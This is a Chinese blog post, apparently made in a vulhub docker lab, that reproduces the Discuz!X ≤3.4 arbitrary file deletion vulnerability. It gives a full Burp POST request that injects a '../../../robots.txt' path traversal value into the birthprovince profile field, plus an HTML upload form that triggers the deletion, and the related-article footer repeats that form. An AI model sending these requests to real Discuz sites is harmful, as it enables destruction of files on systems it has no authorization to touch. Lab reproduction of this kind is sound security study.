Discuz!X ≤3.4 任意文件删除漏洞

于 2024-05-23 15:06:54 发布
阅读量730 收藏
点赞数 3
CC 4.0 BY-SA版权
文章标签: docker
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/qq_52627570/article/details/139145328

启动环境

cd discuz/x3.4-arbitrary-file-deletion
docker-compose build
docker-compose up -d

漏洞复现

1.安装数据库

在浏览器中输入:http://your ip/install/index.php?step=3&install_ucenter=yes

数据库服务器选择db,其他不改变,记得输入管理员密码哦

2.查看robots文件

在浏览器中输入:http://your ip/robots.txt

3.填写信息

点击进入数据库,在设置->个人资料中随意填写一个信息

4.记录formhashcookie

5.burpsuite发送数据包

POST /home.php?mod=spacecp&ac=profile&op=base HTTP/1.1
Host: localhost
Content-Length: 367
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryPFvXyxL45f34L12s
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,en;q=0.6
Cookie: [your cookie]
Connection: close

------WebKitFormBoundaryPFvXyxL45f34L12s
Content-Disposition: form-data; name="formhash"

[your formhash]
------WebKitFormBoundaryPFvXyxL45f34L12s
Content-Disposition: form-data; name="birthprovince"

../../../robots.txt
------WebKitFormBoundaryPFvXyxL45f34L12s
Content-Disposition: form-data; name="profilesubmit"

1
------WebKitFormBoundaryPFvXyxL45f34L12s--

提交后,发现信息已改变

6.新建文件

建立一个upload.html

<body>
    <form action="http://[your-ip]/home.php?mod=spacecp&ac=profile&op=base&profilesubmit=1&formhash=[form-hash]" method="post" enctype="multipart/form-data">
        <input type="file" name="birthprovince" />
        <input type="submit" value="upload" />
    </form>
</body>

在浏览器打开,并上传一个图片

7.再次访问robots.txt

至此,漏洞利用结束。

TJLY…
关注
Discuz!X 3.4任意文件删除漏洞
「我唯一会的和擅长的只有网络安全,如果我不能在我最擅长的事情上取得成功,那么我根本不知道,我的人生还有什么意义。」
10-05 915
文笔生疏,措辞浅薄,望各位大佬不吝赐教,万分感谢。
利用Vulnhub复现漏洞 - Discuz!X 3.4 任意文件删除漏洞
JiangBuLiu的博客
06-28 3383
Apache SSI 远程命令执行漏洞Vulnhub官方复现教程漏洞原理复现漏洞启动环境漏洞复现FormhashCookie发送数据包 Vulnhub官方复现教程 https://vulhub.org/#/environments/httpd/ssi-rce/ 漏洞原理 在测试任意文件上传漏洞的时候,目标服务端可能不允许上传php后缀的文件。如果目标服务器开启了SSI与CGI支持,我们可以上传一个...
Discuz!X 3.4 任意文件删除漏洞 漏洞复现
ADummy的博客
02-05 1537
Discuz!X 3.4 任意文件删除漏洞 by ADummy 0x00利用路线 ​ Discuz个人设置界面—>burpsuite抓包改包—>上传文件替换脏数据—>导致文件删除 0x01漏洞介绍 ​ 通过配置个人信息的属性值,导致文件删除。 ​ 影响版本 Discuz <= 3.4 0x02漏洞复现 ​ 安装Discuz,数据库地址为db ​ 查看robots文件,此时文件存在 ​ 登录,并进去设置页面,点击保存并抓包,formhash值记一下。
DiscuzX 3.4 任意文件删除漏洞
zizizizizi_的博客
01-17 2870
Discuz!X 3.4 任意文件删除漏洞 一、漏洞思路 通过配置个人信息的属性值,删除任意文件 版本 :discuz <= 3.4 二、漏洞复现 1.安装数据库 2.查看robots文件,发现文件存在 3.注册登录,进入设置界面 4.找到formhash值并记录 5.点击保存 ,bp拦截 发送如下 ...
dz论坛Discuz_X3.4最新网站漏洞
热门推荐
网站安全专家
07-11 4万+
近期我们sinesafe安全部门审计discuz最新版的时候发现配置文件写入导致代码执行的问题。cms安装的时候一般会分为几个步骤去进行,其中有对配置文件config进行写入的步骤,当写入的时候未严格限制传入的参数就存在代码执行问题。源码信息:Discuz_X3.4_GIT_SC_UTF8问题文件: \upload\install\index.php漏洞类型:配置文件写入导致代码执行站点地址:ht...
Discuz X 3.4 系列漏洞梳理
weixin_50464560的博客
04-05 2万+
分析了目前已经公开的Dz3.4系列漏洞,作为学习和记录。 Discuz!X 3.4 任意文件删除漏洞 1、简述 漏洞原因:之前存在的任意文件删除漏洞修复不完全导致可以绕过。 漏洞修复时间:2017年9月29日官方对gitee上的代码进行了修复 2、复现环境 因为官方提供的下载是最新的源码,漏洞修复时间是17年9月29日,通过git找一个修复前的版本签出就可。 git checkout 1a912ddb4a62364d1736fa4578b42ecc62c5d0be 通过安装向导安装完.
Discuz! X 3.4 ML 任意代码执行漏洞复现
墙角睡大觉的专栏
07-13 4162
0X1 漏洞概述 2019年7月11日,网络上出现了一个Discuz!ML远程代码执行漏洞的PoC,研究员验证分析发现,攻击者能够利用该漏洞在请求流量的cookie字段中(language参数)插入任意代码,执行任意代码,从而实现完全远程接管整个服务器的目的,该漏洞利用方式简单,危害性较大。漏洞影响范围包括如下版本。 Discuz! ML v.3.4Discuz! ML v.3.3Discuz...
Discuz! X3.4 正式版 简体中文 UTF8 v20200818
04-23
X3.4 在继承和完善 Discuz! X3.3 的基础上,针对 PHP7 进行了优化。对于 X3.2 用户来说,X3.3 已继承了 X3.2 的补丁修复工作。安全稳定的程序为站长提供更加可靠的保障。主要更新功能为: 1、完善视频解析播放 2...
Discuz! X3.4 繁体中文-PHP
06-20
Discuz! X3.4 在继承和完善 Discuz! X3.3 的基础上,去除了云平台的相关代码,其他功能保持不变,如果您的论坛不需要云平台可以选择安装或更新到此版本。 主要更新功能为: 1、完善视频解析播放 2、HTTPS兼容性优化 3、修复各类已知BUG和漏洞 修复与优化的问题列表: 1、对备案号的网址进行更新 2、修复 一处PHP5.3不兼容的写法 3、修复 目前系统内存在的部分小Bug 4、清除文本格式功能 增强 5、因视频认证已无法使用,去掉用户的个人空间 - 个人资料页的:“视频认证:未认证”。 6、修复 版块页未判断是否可发帖就显示验证码的问题 7、修复UC后台文件里的目录路径获取方式,方便站长更换入口名称 8、优化 语音验证码通过HTML5播放,放弃Flash 9、修复 系统内存在的部分小Typo 10、修复 小黑屋页面“更多”按钮行为异常的问题 11、修复主题发布页,当没有可修复数据时,点击修复数据的提示框类型不正常 12、修复新版本chrome下帖子列表页加载按钮行为异常的问题 13、修复 语言包的spacecp中积分代码有误的问题 14、修复 系统无法阻止某些无法正常登录的特殊符号用于注册用户名的问题 15、修复 HTML5通知功能在现代浏览器不可用的问题 16、修正官方拼写错误导致用户资料中的 【加入的群组】 无显示问题 17、修复 在部分情况下高亮功能导致页面卡死的问题 18、修复 chrome下编辑器插入链接功能无法立即使用的问题 19、修复 开启内存缓存时,forum_forumfield 表没被缓存导致的主题分类消失、版块规则消失、访问权限无效等问题 20、删除用户无法删除 用户记录表(home_doing)数据 21、修复 默认关闭非安全请求升级,保证HTTP外域资源正常显示 22、修复 IE11及firefox在使用编辑器按钮的时候出现的bug 23、修复 个人资料页点击放大签名档图片时样式缺失的问题 24、修复 帖子列表页点击长条形下一页按钮时加载出的帖子后方图标样式异常的问题 25、修复 IE9及以上在多处出现的css错位问题 26、修复 补全IN_DISCUZ相关代码 27、修复 云平台插件降级工具无法降级一部分云平台插件的问题 28、修复 使用花括号做数组被废弃导致在部分服务器配置下产生提示信息导致程序功能异常的Bug 29、优化 HTTPS兼容性优化 30、图片宽高一样时,无法缩放 31、修复 在PHP 5.3下内存缓存报错的Bug 32、修复 开启“关闭session机制”后,论坛验证码即使正确也会弹出错误提示 33、修复 并发任务可能产生的刷分问题 34、防止并发评分与道具的接口产生的刷分等问题 35、【轻量级 PR】:修复 HTTPS下二维码不显示BUG 36、修复 部分发送邮件场景下信任HTTP_HOST所带来的安全隐患 37、修复 UCenter任意文件包含Bug 38、【轻量级 PR】:修复 msapplication-task 字段的笔误 39、【轻量级 PR】:修复 界面 ? 风格管理中新增操作结果混乱的问题 40、修复 IE6、IE7等浏览器提示common.js报错的Bug 41、修复 前台充值卡密页面不显示验证码和同一卡密充值2次成功的Bug 42、【轻量级 PR】:修复门户”模块管理“菜单高亮相关BUG 43、【轻量级 PR】:修复target书写错误问题 44、【轻量级 PR】:修复 在宽屏模式下点击切换配色时,宽屏状态被破坏且无法切换的问题 45、【轻量级 PR】:修复 在PHP 5.3下核心报错的Bug 46、修复 当开启顶部导航固定、头像区域固定时,滚动页面出现页面、元素跳动,及元素闪烁等问题 47、修复 dintval BUG 48、优化 HTTPS兼容性优化 49、修复 目前系统内存在的部分小Bug 50、【轻量级 PR】:修复 一处后台点击后会出现双层frame的问题 51、修复部分页面游客无法看见关键字、描述的BUG 52、修复 通知提醒页面分页链接错误的BUG 53、【轻量级 PR】:优化 去除Manyou残余代码 54、修复 道具中心列表页在部分情况下排序异常的Bug 55、附件下载500错误修复 56、优化 放松视频网站链接解析标准 57、修复 交易贴买家卖家评价数据展示异常的问题、交易贴模板不支持自适应展示的问题 58、修复 由于调用顺序问题导致MIME Type设置无法生效的问题 59、优化 触屏版支持视频在线播放、新增 AcFun和哔哩哔哩等网站的视频解析 60、修复 邮件验证链接有效期内可以强制修改用户邮箱的Bug 61、优化 支持论坛、日志模块部分音视频格式、部分网站的HTML5播放 62、优化 回帖回收站支持自定义单页面审
漏洞复现-DiscuzX 3.4 任意文件删除漏洞
qq_59350385的博客
05-10 1063
一、环境搭建 本次用的是vulhub靶场 执行下列命令部署 Discuz!X 安装环境 docker-compose up -d 安装时,只用修改数据库地址为`db`,其他保持默认即可: 二、漏洞复现 (1)访问`http://your-ip/robots.txt`可见robots.txt是存在的: (2)注册用户hahaha (3)在个人设置页面找到自己的formhash (4)带上自己的Cookie、formhash发送如下数据包 (5)查看个人设置页面的出生地
Discuz! 系列<=3.4 后台 sql注入漏洞
weixin_46801402的博客
07-29 5220
Discuz!X全版本存在SQL注入漏洞漏洞产生的原因是source\admincp\admincp_setting.php在处理$settingnew['uc']['appid']参数时未进行完全过滤,导致出现二次注入。在特定条件下,攻击者可以利用该漏洞获取服务器权限。...
Discuz开源论坛_v3.4系列_远程代码执行漏洞详解
weixin_60708754的博客
05-15 6001
Discuz v3.4系列 远程代码执行漏洞全流程详解
dz文件cp.php,Discuz!X 3.4 任意文件删除漏洞分析
weixin_39692254的博客
04-06 427
作者:LoRexxar’@知道创宇404实验室日期:2017年9月30日0x01 简述Discuz!X社区软件,是一个采用 PHP 和 MySQL 等其他多种数据库构建的性能优异、功能全面、安全稳定的社区论坛平台。2017年9月29日,Discuz!修复了一个安全问题用于加强安全性,这个漏洞会导致前台用户可以导致任意删除文件漏洞。2017年9月29日,知道创宇404 实验室开始应急,经过知道创宇4...
Discuz!X 3.4 前台任意文件删除漏洞复现
weixin_30399155的博客
10-11 632
Discuz!X 3.4 前台任意文件删除漏洞复现 参考链接: http://www.freebuf.com/vuls/149904.html http://www.freebuf.com/articles/system/149810.html http://mp.weixin.qq.com/s?srcid=0930uM1OtfeAsXwHRrfZBIyo&scene=23&...
Discuz!X 3.4 任意文件删除漏洞复现过程(附python脚本)
weixin_33774883的博客
10-01 457
  今天看下群里在讨论Discuz!X 3.4 任意文件删除漏洞,自己做了一些测试,记录一下过程。结尾附上自己编写的python脚本,自动化实现任意文件删除。 具体漏洞,请查看 https://paper.seebug.org/411/ 0x01 环境搭建   到官网下载Discuz 3.4版本,phpstudy 本机搭建,并注册账号。站点根目录新建11...
Discuz2.5-3.4任意文件删除漏洞分析
老北京砸酱锤的博客
06-22 729
Discuz!X 3.4 任意文件删除漏洞 Discuz!X社区软件,是一个采用 PHP 和 MySQL 等其他多种数据库构建的性能优异、功能全面、安全稳定的社区论坛平台。 2017年9月29日,Discuz!修复了一个安全问题用于加强安全性,这个漏洞会导致前台用户可以导致任意删除文件漏洞。 修复建议 升级到最新版本的 Discuz! 实验环境 操作机:centos7 目标地址:192.168.0.105 Discuz版本:3.1 实验步骤 步骤1:了解原理 该漏洞于2014年6.
discuz! x3.4漏洞
最新发布
03-26
### Discuz! X3.4 漏洞详情与修补方法 #### 一、任意文件删除漏洞 Discuz! X ≤3.4 存在一个任意文件删除漏洞,其根本原因在于`home.php`模块中的参数未经过严格校验。攻击者可以通过构造恶意请求来触发此漏洞删除目标服务器上的任意文件[^1]。 以下是漏洞POC代码: ```html <body> <form action="http://[这里填写网站域名]/home.php?mod=spacecp&ac=profile&op=base&profilesubmit=1&formhash=[这里填写刚刚得到的hash]" method="post" enctype="multipart/form-data"> <input type="file" name="birthprovince" /> <input type="submit" value="upload" /> </form> </body> ``` **修复建议**: 开发者应验证上传路径和文件名的有效性,并限制敏感操作所需的权限级别。此外,在最新版本中已修复该问题,因此升级到官方推荐的安全补丁或更高版本是最有效的解决方案[^4]。 --- #### 二、后台 SQL 注入漏洞 在 `source\admincp\admincp_setting.php` 文件中,程序对 `$settingnew[&#39;uc&#39;][&#39;appid&#39;]` 参数缺乏充分过滤机制,从而引发二次注入风险。如果数据库配置允许堆叠查询,则可能被用于执行额外命令甚至控制整个系统[^3]。 **防御措施**: 为了防止此类攻击发生,管理员应当启用严格的输入验证逻辑;同时关闭 MySQL 中不必要的功能(如多语句支持)。另外,及时安装由厂商发布的安全更新包也是必要的预防手段之一。 --- #### 三、ML 版本远程代码执行 (RCE) 缺陷 针对基于 PHP 的 CMS 平台——包括但不限于 Discuz! ML v3.x 系列产品线——均暴露出潜在危险程度极高的 RCE 隐患。具体表现为当满足一定条件之后便能够成功调用 eval() 函数解析未经审查的数据流进而实现非法目的[^2]。 **解决办法**: 重新设计涉及动态评估字符串表达式的部分代码结构以减少依赖关系;或者考虑迁移到更加现代化且安全性更高的替代品上运行业务流程。当然定期备份重要资料以及密切跟踪官方公告同样不可或缺。 --- ### 结论 综上所述,对于仍然使用旧版软件的企业和个人来说,保持警惕性和采取积极主动的态度去应对可能出现的各种威胁至关重要。通过遵循上述指导原则可以有效降低遭受网络犯罪分子侵害的可能性。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值